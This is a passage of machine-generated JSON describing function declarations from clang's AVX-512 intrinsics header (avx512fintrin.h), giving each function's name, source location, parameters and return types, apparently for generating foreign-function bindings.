"/usr/lib/clang/9.0.0/include/avx512fintrin.h:8364:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__mmask16" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "_kortestc_mask16_u8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:8370:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__mmask16" } }], "return-type": { "tag": ":unsigned-char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "function", "name": "_kortestz_mask16_u8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:8376:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__mmask16" } }], "return-type": { "tag": ":unsigned-char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "function", "name": "_kortest_mask16_u8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:8382:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__C", "type": { "tag": ":pointer", "type": { "tag": ":unsigned-char", "bit-size": 8, "bit-alignment": 8 } } }], "return-type": { "tag": ":unsigned-char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "function", "name": "_mm512_kunpackb", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:8388:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__mmask16" } }], "return-type": { "tag": "__mmask16" } }, { "tag": "function", "name": "_mm512_kxnor", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:8394:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__mmask16" } }], "return-type": { "tag": "__mmask16" } }, { "tag": "function", "name": "_mm512_kxor", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:8400:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__mmask16" } }], "return-type": { "tag": "__mmask16" } }, { "tag": "function", "name": "_cvtmask16_u32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:8419:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__mmask16" } }], "return-type": { "tag": ":unsigned-int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "_cvtu32_mask16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:8424:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": ":unsigned-int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": "__mmask16" } }, { "tag": "function", "name": "_load_mask16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:8429:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": ":pointer", "type": { "tag": "__mmask16" } } }], "return-type": { "tag": "__mmask16" } }, { "tag": "function", "name": "_store_mask16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:8434:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": ":pointer", "type": { "tag": "__mmask16" } } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__mmask16" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_mm512_stream_si512", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:8439:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": "__m512i" } } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_mm512_stream_load_si512", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:8446:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_stream_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:8453:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512d" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_mm512_stream_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:8460:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_mm512_mask_compress_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:8467:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512d" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512d" } }], "return-type": { "tag": "__m512d" } }, { "tag": "function", "name": "_mm512_maskz_compress_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:8475:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512d" } }], "return-type": { "tag": "__m512d" } }, { "tag": "function", "name": "_mm512_mask_compress_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:8484:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_maskz_compress_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:8492:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_mask_compress_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:8501:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512" } }], "return-type": { "tag": "__m512" } }, { "tag": "function", "name": "_mm512_maskz_compress_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:8509:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512" } }], "return-type": { "tag": "__m512" } }, { "tag": "function", "name": "_mm512_mask_compress_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:8518:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_maskz_compress_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:8526:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_test_epi32_mask", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:8581:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__mmask16" } }, { "tag": "function", "name": "_mm512_mask_test_epi32_mask", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:8588:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__mmask16" } }, { "tag": "function", "name": "_mm512_test_epi64_mask", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:8595:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__mmask8" } }, { "tag": "function", "name": "_mm512_mask_test_epi64_mask", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:8602:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__mmask8" } }, { "tag": "function", "name": "_mm512_testn_epi32_mask", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:8609:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__mmask16" } }, { "tag": "function", "name": "_mm512_mask_testn_epi32_mask", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:8616:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__mmask16" } }, { "tag": "function", "name": "_mm512_testn_epi64_mask", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:8623:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__mmask8" } }, { "tag": "function", "name": "_mm512_mask_testn_epi64_mask", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:8630:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__mmask8" } }, { "tag": "function", "name": "_mm512_movehdup_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:8637:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512" } }], "return-type": { "tag": "__m512" } }, { "tag": "function", "name": "_mm512_mask_movehdup_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:8644:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512" } }], "return-type": { "tag": "__m512" } }, { "tag": "function", "name": "_mm512_maskz_movehdup_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:8652:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512" } }], "return-type": { "tag": "__m512" } }, { "tag": "function", "name": "_mm512_moveldup_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:8660:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512" } }], "return-type": { "tag": "__m512" } }, { "tag": "function", "name": "_mm512_mask_moveldup_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:8667:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512" } }], "return-type": { "tag": "__m512" } }, { "tag": "function", "name": "_mm512_maskz_moveldup_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:8675:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512" } }], "return-type": { "tag": "__m512" } }, { "tag": "function", "name": "_mm_mask_move_ss", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:8683:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm_maskz_move_ss", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:8689:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm_mask_move_sd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:8696:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128d" } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm_maskz_move_sd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:8702:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128d" } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm_mask_store_ss", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:8709:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": ":pointer", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_mm_mask_store_sd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:8715:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": ":pointer", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128d" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_mm_mask_load_ss", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:8721:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": ":pointer", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm_maskz_load_ss", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:8731:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": ":pointer", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm_mask_load_sd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:8739:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": ":pointer", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm_maskz_load_sd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:8749:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": ":pointer", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm512_mask_expand_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:8770:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512d" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512d" } }], "return-type": { "tag": "__m512d" } }, { "tag": "function", "name": "_mm512_maskz_expand_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:8778:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512d" } }], "return-type": { "tag": "__m512d" } }, { "tag": "function", "name": "_mm512_mask_expand_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:8786:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_maskz_expand_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:8794:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_mask_expandloadu_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:8802:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512d" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }], "return-type": { "tag": "__m512d" } }, { "tag": "function", "name": "_mm512_maskz_expandloadu_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:8810:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }], "return-type": { "tag": "__m512d" } }, { "tag": "function", "name": "_mm512_mask_expandloadu_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:8818:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_maskz_expandloadu_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:8826:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_mask_expandloadu_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:8834:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }], "return-type": { "tag": "__m512" } }, { "tag": "function", "name": "_mm512_maskz_expandloadu_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:8842:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }], "return-type": { "tag": "__m512" } }, { "tag": "function", "name": "_mm512_mask_expandloadu_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:8850:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_maskz_expandloadu_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:8858:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_mask_expand_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:8866:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512" } }], "return-type": { "tag": "__m512" } }, { "tag": "function", "name": "_mm512_maskz_expand_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:8874:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512" } }], "return-type": { "tag": "__m512" } }, { "tag": "function", "name": "_mm512_mask_expand_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:8882:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_maskz_expand_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:8890:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_cvtps_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:8913:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m256" } }], "return-type": { "tag": "__m512d" } }, { "tag": "function", "name": "_mm512_mask_cvtps_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:8919:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512d" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256" } }], "return-type": { "tag": "__m512d" } }, { "tag": "function", "name": "_mm512_maskz_cvtps_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:8927:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256" } }], "return-type": { "tag": "__m512d" } }, { "tag": "function", "name": "_mm512_cvtpslo_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:8935:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512" } }], "return-type": { "tag": "__m512d" } }, { "tag": "function", "name": "_mm512_mask_cvtpslo_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:8941:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512d" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512" } }], "return-type": { "tag": "__m512d" } }, { "tag": "function", "name": "_mm512_mask_mov_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:8947:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512d" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512d" } }], "return-type": { "tag": "__m512d" } }, { "tag": "function", "name": "_mm512_maskz_mov_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:8955:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512d" } }], "return-type": { "tag": "__m512d" } }, { "tag": "function", "name": "_mm512_mask_mov_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:8963:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512" } }], "return-type": { "tag": "__m512" } }, { "tag": "function", "name": "_mm512_maskz_mov_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:8971:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512" } }], "return-type": { "tag": "__m512" } }, { "tag": "function", "name": "_mm512_mask_compressstoreu_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:8979:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": 